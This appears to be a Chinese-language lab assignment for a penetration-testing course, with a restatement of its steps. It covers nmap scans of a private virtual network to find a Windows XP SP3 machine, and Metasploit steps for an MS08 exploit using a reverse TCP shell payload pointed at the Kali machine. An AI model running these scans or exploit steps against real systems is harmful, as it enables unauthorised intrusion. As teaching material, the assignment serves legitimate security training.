table {
border-collapse: collapse;
width: 100%;
margin-bottom: 1rem;
}
th, td {
border: 1px solid #ddd;
padding: 8px;
text-align: left;
}
th {
background-color: #f2f2f2;
}
tr:nth-child(even) {
background-color: #f9f9f9;
}
pre {
background-color: #f8f8f8;
padding: 15px;
border-radius: 4px;
overflow-x: auto;
}
1、任务1:网络扫描 – 在虚拟化系统顺利运行后,假设你对网络中的机器一无所知(不知道IP地址、操作系统、MAC地址或任何其他特征)。请按照以下步骤操作:(a) 启动三台虚拟机并分别登录。使用ip命令(或ifconfig)在Kali和Ubuntu虚拟机中查找并记录每台机器的IP地址,在Windows虚拟机中使用ipconfig命令。使用ping命令验证这三台机器之间的连通性。记录你的实验过程并记录遇到的任何困难。(b) 在Kali虚拟机中,使用在后台运行的Wireshark捕获专用网络中的所有流量。确保你能够捕获所有流量,并记得在执行以下每个任务之前启动它,最后停止并将每个部分的流量保存到单独的文件中,以便日后分析。(c) 使用Nmap进行网络扫描。执行以下命令:i. nmap -sS 192.168.100.1/24;ii. nmap -n -sV 192.168.100.1/24;iii. nmap -A -T4 192.168.100.1/24;iv. nmap -O 192.168.100.1/24;v. nmap -v -O 192.168.100.1/24;vi. nmap -sT -sV 192.168.100.1/24;vii. nmap -O -sV -sC -oX outfile.xml –webxml 192.168.100.1 – 254。在日志中记录每个命令获得的信息,并对它们的差异进行评论(着重强调持续时间和流量级别的攻击性)。考虑到这个发现阶段的主要目标,确定哪些Nmap选项对于实现上述每种扫描类型的目标更有效。尝试制定一个策略,以在对网络流量造成最小干扰的情况下获取尽可能多的信息。这项任务的主要目标是定位Windows XP SP3虚拟机并找出其主要特征(MAC地址、IP地址、操作系统、服务等)。将所有这些特征记录在日志中。
按步骤操作:
启动三台虚拟机并登录
– 在 Kali 和 Ubuntu 中使用
ip
或
ifconfig
命令
– 在 Windows 中使用
ipconfig
命令
– 查找并记录 IP 地址
– 使用
ping
命令验证连通性
– 记录实验过程和遇到的困难
捕获网络流量
– 在 Kali 虚拟机后台运行 Wireshark
– 捕获专用网络中的所有流量
– 执行任务前启动捕获,结束后停止
– 将各部分流量保存到单独的文件中
执行 Nmap 命令并分析
– 依次执行指定的 Nmap 命令
– 在日志中记录各命令的信息
– 评论不同命令之间的差异(强调持续时间和流量攻击性)
– 确定更有效的 Nmap 选项
– 制定获取信息且减少流量干扰的策略
– 定位 Windows XP SP3 虚拟机
– 记录其 MAC 地址、IP 地址、操作系统、服务等特征到日志中
2、请简述利用Metasploit工具进行漏洞利用的操作步骤,具体如下:(a) 启动Metasploit框架,可从菜单“应用程序”→“漏洞利用工具”→“Metasploit框架”启动,若有需要手动启动相关服务(先执行“service postgresql start”,接着执行“service metasploit start”,然后执行“msfconsole”)。(b) 在Metasploit控制台进行以下操作:i. 输入命令“help”,并尝试“help <命令>”(例如“help route”和“help search”);ii. 输入命令“search MS08”,确定所需的漏洞利用程序后,使用命令“info <漏洞利用程序>”获取更多信息并记录;iii. 执行命令“use <漏洞利用程序>”;iv. 使用命令“show options”,用目标机器的地址设置变量“RHOST”,重新运行“show options”以检查所有必需的变量是否已设置,注意“Exploit Target”选项设置为自动模式;v. 运行“show payloads”,选择有效负载“generic/shell_reverse_tcp”,用Kali虚拟机的IP地址设置变量“LHOST”。
该部分内容是关于利用Metasploit工具进行漏洞利用的操作步骤说明,具体操作如下:
启动Metasploit框架:
可从菜单“应用程序”→“漏洞利用工具”→“Metasploit框架”启动,或手动启动相关服务(先启动PostgreSQL服务,再启动Metasploit服务,最后执行
msfconsole
)。
在Metasploit控制台操作:
i. 输入
help
命令,还可尝试
help <命令>
获取特定命令帮助。
ii. 输入
search MS08
查找相关漏洞利用程序,用
info <漏洞利用程序>
获取详细信息并记录。
iii. 执行
use <漏洞利用程序>
。
iv. 用
show options
查看选项,设置
RHOST
为目标机器地址,再次运行
show options
检查设置情况,
Exploit Target
为自动模式。
v. 运行
show payloads
,选择
generic/shell_reverse_tcp
有效负载,设置
LHOST
为Kali虚拟机IP地址。